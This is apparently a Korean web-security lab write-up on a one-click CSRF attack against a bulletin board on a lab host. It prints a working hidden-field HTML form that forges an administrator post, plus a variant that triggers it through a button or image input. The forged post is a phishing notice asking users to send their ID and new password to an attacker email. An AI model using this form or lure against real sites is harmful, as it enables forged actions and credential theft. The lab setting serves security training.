[WebSec] CSRF 공격 Lab 04

one-click attack

1. CSRF 공격 방법 중 One-click Attack은 게시글 자동 생성 후 게시글 리스트로 돌아가는 현상을 해결하기 위해, 그리고 script가 제한되어 있는 경우 사용할 수 있는 방법이다.

2. One-click Attack을 이용해 게시글 자동 작성 공격을 하라.
<hint> 로그인 폼을 만들어 주는 소스코드에 있습니다.

<form id="board" method="post" action="http://192.168.65.20/board/board_write_ok.asp" enctype="multipart/form-data">
    <input type="hidden" name="name" value="관리자">
    <input type="hidden" name="password" value="1234">
    <input type="hidden" name="email" value="admin@webhack.com">
    <input type="hidden" name="subject" value="공지사항">
    <input type="hidden" name="tag" value="T">
    <input type="hidden" name="content" value="서비스의 기술적인 문제로 인해 고객님들의 비밀번호가 노출 되었습니다. 아래 메일로 고객님의 ID와 변경할 비밀번호를 즉시 보내주시길 바랍니다. 감사합니다. attacker@webhack.com">
    <input type="submit" name="submit" value="추천">
    <input type="submit" name="submit" value="비추천">
</form>

 

kali

글 작성

 

xp

글 클릭

추천 클릭

공지사항 글이 추가된 모습

 

추가 활용

<button type="submit" value="submit">비추</button>
<input type="image" src"/board/upload/hyosung.jpg" alt="test">

<form id="board" method="post" action="http://192.168.65.20/board/board_write_ok.asp" enctype="multipart/form-data">
    <input type="hidden" name="name" value="관리자">
    <input type="hidden" name="password" value="1234">
    <input type="hidden" name="email" value="admin@webhack.com">
    <input type="hidden" name="subject" value="공지사항">
    <input type="hidden" name="tag" value="T">
    <input type="hidden" name="content" value="서비스의 기술적인 문제로 인해 고객님들의 비밀번호가 노출 되었습니다. 아래 메일로 고객님의 ID와 변경할 비밀번호를 즉시 보내주시길 바랍니다. 감사합니다. attacker@webhack.com">
    <input type="submit" name="submit" value="추천">
    <input type="submit" name="submit" value="비추천">
    <button type="submit" value="submit">비추</button>
	<input type="image" src"/board/upload/hyosung.jpg" alt="test">
</form>

test 클릭

정상 실행됨